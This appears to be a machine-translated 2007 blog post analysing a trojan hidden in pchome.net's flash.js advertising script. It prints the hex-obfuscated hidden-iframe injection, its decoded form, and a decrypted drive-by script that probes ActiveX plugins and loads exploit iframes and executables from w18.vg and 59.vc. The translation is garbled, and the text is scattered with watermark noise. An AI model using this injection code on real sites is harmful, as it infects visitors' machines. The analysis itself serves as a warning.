Last week method virus source unexpectedly for Ad.pchome.net originally was hanged horse _ virus killing

Hung more concealed, the middle of the http://btn.pchome.net/flash.js was added to the following code:

window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65\x6c\x6e"] (' \x3c\x69\x66\x72\x61\x6d\x65 \x68\ x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\ X77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\ x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e ');

That's it:

window["Document" ["Writeln"] (' <iframe height=0 width=0 src= ' http://www.59.vc/page/add_644455.htm " Iframe> ');

But only this JS will not make the IFRAME effective, so that he is in effect is to call this JS display Flash code:

<script language= "javascript" type= "Text/javascript" >
Writeflashhtml ("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250", "_wmode= Opaque ");
</script>

With this, the IFRAME takes effect; After a few calls and decryption:

Function biskis () {for (i=2;i<26;i++) {var kis6=new image (); Var kis7=new image (); var  root=string.fromcharcode (65+i); kis6.src= "mk: @MSITStore:" +root+ ": \\program files\\kaspersky lab \\kaspersky internet security 6.0\\doc\\context.chm::/images/help.gif "kis7.src=" mk: @MSITStore: "+root+": \\program files\\kaspersky lab\\kaspersky internet security 7.0\\doc\\ Context.chm::/images/help.gif "; if (kis6.height==41| | kis7.height==41) return true}return false}var then=new date (); aaxxx= "Xxxyyyyfassssfsadfasdf "; Then.settime (Then.gettime () +24*60*60*1000); var aaffdasfascookie=new string (document.cookie); var  cookieheader= "cookie1="; aaxxx= "XXXYYYYFASSSSFSADFASDF"; if (!biskis () &&aaffdasfascookie.indexof ( Cookieheader) ==-1 {aaxxx= "xxxyyyyfassssfsadfasdf";d ocument.cookie= "cookie1=popwindos;expires=" + Then.togmtstring (); aaxxx= "Xxxyyyyfassssfsadfasdf"; Try{if (New activexobject ("Ierpctl.ierpctl.1 ")) document.write (' <iframe style=display:none src=" Http://w18.vg/real.gif "></iframe>") }catch (e) {}try{if (Navigator.userAgent.toLowerCase (). IndexOf ("msie 7") ==-1) document.write (' <iframe  style=display:none src= "Http://w18.vg/ms.gif" ></iframe> ")}catch (e) {}try{if (new  ActiveXObject ("Dpclient.vod")) document.write (' <iframe style=display:none src= ' http://w18.vg/ Xl.gif "></iframe>")}catch (e) {}try{if (New activexobject ("Glchat. GLCHATCTRL.1 ")) document.write (' <iframe style=display:none src= ' http://w18.vg/lz.gif ' ></ Iframe> ')}catch (e) {}try{if ("MPS") (New activexobject). Stormplayer.1 ")) document.write (' <iframe style=display:none src= ' http://w18.vg/bf.gif ' ></ Iframe> ')}catch (e) {}try{if (New activexobject ("BAIDUBAR.TOOL.1")) document.write (' <iframe style= Display:none src= "Http://w18.vg/baidu.gif" ></iframe> ")}catch (e) {}}

k# #Ｅ +xd++ik+ex= #Ｄ $ikexd+$i#kexdi+k$ex$di$$ke# #Ｘ #di=k+e$x=$di#k+ #ＥＸ =dik=e$=xdik=$ex=dik$e$ #Ｘ =d=i# #ＫＥ #=x+$d+

Picked a few declassified: Http://w18.vg/s.exe

Get another link from this file: Http://w18.vg/ss.exe

Something that looks familiar ...

# #Ｋ =e#x+d=ike$xd$=i==k+ #ＥＸＤ = #Ｉ =ke$+xdi#k$=ex=d= #ＩＫ +e=x$d==i= #Ｋ =e# #Ｘ $d$+ik= #ＥＸＤ +ik$ex$=d+i+k#e$xd+ikex#d

Can know from above, the problem is that flash.js, so all use this JS to put Flash page all poisonous! I casually find a few pages, found are poisonous, this time but a large area of the hanging slightly, comrades themselves carefully.

k$ex=+di#$ke+x#dik$exd$i=ke$xd+ #Ｉ +kexd=i+ke=x$d=i=kexd#=ik==e$x=d=i#+kexd=ik#ex#di=k=e=x= #ＤＩＫＥＸＤＩ #ke

Reprint please keep the statement! (http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html)